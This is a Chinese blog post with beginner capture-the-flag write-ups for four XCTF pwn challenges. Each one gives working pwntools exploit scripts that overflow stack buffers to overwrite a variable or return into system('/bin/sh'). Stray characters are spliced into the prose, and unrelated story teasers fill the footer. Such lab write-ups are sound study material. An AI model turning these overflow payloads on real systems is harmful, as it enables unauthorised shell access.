攻防世界pwn

攻防世界:https://adworld.xctf.org.cn/login?prev=%2Ftask

小白做的簡單題

where_did_you_born
checksec,64位程序


ida 查看
main

可以看出當 v5 = 1926 時就可以 catflag,但是在第一個 if 判斷中當 v5 = 1926 時就直接忽略了 else 判斷,看到 gets 函數(shù)要求輸入 v4,同時 gets 函數(shù)是一個可以無限輸入數(shù)據(jù)的函數(shù)躺孝,所以可以利用 v4 來覆蓋 v5,讓 v5 = 1926。
v4 和 v5 的地址相差為 0x20 - 0x18 = 0x8



exp

#!/usr/bin/python
#-*-coding:utf-8 -*-
from pwn import *

p = process('./where_did_you_born')
#p = remote("111.198.29.45","54215")

p.recvuntil('Birth?')
p.sendline('1925')

p.recvuntil('Name?')
payload = 'A' * 8 + p64(1926)

p.sendline(payload)
p.interactive()

level0
checksec红且,64位程序


ida 查看,存在溢出涤姊,并且程序中存在 system('/bin/sh')

vulnerable_function

callsystem

callsystem 地址


exp

#!/usr/bin/python
#coding:utf-8
from pwn import *

p = process('./level0')
#p = remote('111.198.29.45','35394')

callsystem = 0x0400596

payload = 'A' * 0x80
payload += p64(0)
payload += p64(callsystem)

p.sendline(payload)
p.interactive()

level2
checksec暇番,32位程序


ida 查看,存在溢出思喊,程序中 system 函數(shù)的參數(shù)不對壁酬,但同時程序中存在 /bin/sh 字符串

vulnerable_function

main


ida 查看 system 函數(shù)和 /bin/sh 字符串的地址

system

/bin/sh

exp

#!/usr/bin/python
#coding:utf-8
from pwn import *

p = process('./level2')
#p = remote('111.198.29.45','52640')

system = 0x08048320
bin_sh = 0x0804A024

payload = 'A' * 0x88
payload += p32(0)
payload += p32(system)
payload += p32(0)
payload += p32(bin_sh)

p.sendline(payload)
p.interactive()

cgpwn2
checksec,32位程序


ida 查看搔涝,存在 system 函數(shù)厨喂,但是沒有 /bin/sh 字符串

hello

hello

system

利用 fgets 函數(shù)將 /bin/sh 寫入 bss 段



exp

#!/usr/bin/python
#-*-coding:utf-8 -*-
from pwn import *

p = process('./cgpwn2')
#p = remote('111.198.29.45',57244)

system = 0x08048420
bss = 0x0804A080

p.recvuntil('name')
p.sendline("/bin/sh")
p.recvuntil('here:')

payload = 'A' * 0x26
payload += p32(0)
payload += p32(system)
payload += p32(0)
payload += p32(bss)

p.sendline(payload)
p.interactive()
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市庄呈,隨后出現(xiàn)的幾起案子蜕煌,更是在濱河造成了極大的恐慌,老刑警劉巖诬留,帶你破解...
    沈念sama閱讀 211,265評論 6 490
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件斜纪,死亡現(xiàn)場離奇詭異贫母,居然都是意外死亡,警方通過查閱死者的電腦和手機盒刚,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,078評論 2 385
  • 文/潘曉璐 我一進店門腺劣,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人因块,你說我怎么就攤上這事橘原。” “怎么了涡上?”我有些...
    開封第一講書人閱讀 156,852評論 0 347
  • 文/不壞的土叔 我叫張陵趾断,是天一觀的道長。 經(jīng)常有香客問我吩愧,道長芋酌,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 56,408評論 1 283
  • 正文 為了忘掉前任雁佳,我火速辦了婚禮脐帝,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘糖权。我一直安慰自己堵腹,他們只是感情好,可當我...
    茶點故事閱讀 65,445評論 5 384
  • 文/花漫 我一把揭開白布温兼。 她就那樣靜靜地躺著秸滴,像睡著了一般。 火紅的嫁衣襯著肌膚如雪募判。 梳的紋絲不亂的頭發(fā)上荡含,一...
    開封第一講書人閱讀 49,772評論 1 290
  • 那天,我揣著相機與錄音届垫,去河邊找鬼释液。 笑死,一個胖子當著我的面吹牛装处,可吹牛的內(nèi)容都是我干的误债。 我是一名探鬼主播,決...
    沈念sama閱讀 38,921評論 3 406
  • 文/蒼蘭香墨 我猛地睜開眼妄迁,長吁一口氣:“原來是場噩夢啊……” “哼寝蹈!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起登淘,我...
    開封第一講書人閱讀 37,688評論 0 266
  • 序言:老撾萬榮一對情侶失蹤箫老,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后黔州,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體耍鬓,經(jīng)...
    沈念sama閱讀 44,130評論 1 303
  • 正文 獨居荒郊野嶺守林人離奇死亡阔籽,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 36,467評論 2 325
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了牲蜀。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片笆制。...
    茶點故事閱讀 38,617評論 1 340
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖涣达,靈堂內(nèi)的尸體忽然破棺而出在辆,到底是詐尸還是另有隱情,我是刑警寧澤峭判,帶...
    沈念sama閱讀 34,276評論 4 329
  • 正文 年R本政府宣布开缎,位于F島的核電站棕叫,受9級特大地震影響林螃,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜俺泣,卻給世界環(huán)境...
    茶點故事閱讀 39,882評論 3 312
  • 文/蒙蒙 一疗认、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧伏钠,春花似錦横漏、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,740評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至赴肚,卻和暖如春素跺,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背誉券。 一陣腳步聲響...
    開封第一講書人閱讀 31,967評論 1 265
  • 我被黑心中介騙來泰國打工指厌, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人踊跟。 一個月前我還...
    沈念sama閱讀 46,315評論 2 360
  • 正文 我出身青樓踩验,卻偏偏與公主長得像,于是被迫代替她去往敵國和親商玫。 傳聞我的和親對象是個殘疾皇子箕憾,可洞房花燭夜當晚...
    茶點故事閱讀 43,486評論 2 348

推薦閱讀更多精彩內(nèi)容

  • checksec一下 試運行一下,有兩個輸入 放入64位IDA 我們輸入v5時又不能輸入1926拳昌,但是下面判斷時又...
    杰_74閱讀 855評論 0 0
  • checksec后試運行袭异,有兩個輸入 32位ida 點進去hello() 可以利用fgets和gets棧溢出 發(fā)現(xiàn)...
    杰_74閱讀 530評論 0 0
  • checksec然后試運行 放入64位ida,看看main函數(shù) 點擊read函數(shù)里的unk_601068地回,再點擊i...
    杰_74閱讀 1,660評論 0 0
  • checksec然后試運行 放入64位IDA扁远,F(xiàn)5大法 發(fā)現(xiàn)callsystem函數(shù) 找到callsystem的地...
    杰_74閱讀 674評論 0 0
  • 大愛的李老師俊鱼,智慧的班主任,諸位親愛的學兄們畅买,大家好并闲!我是青島環(huán)宇印刷廣告的譚京芳,今天(2019年2月1日)是我...
    2819336a9c2b閱讀 98評論 0 1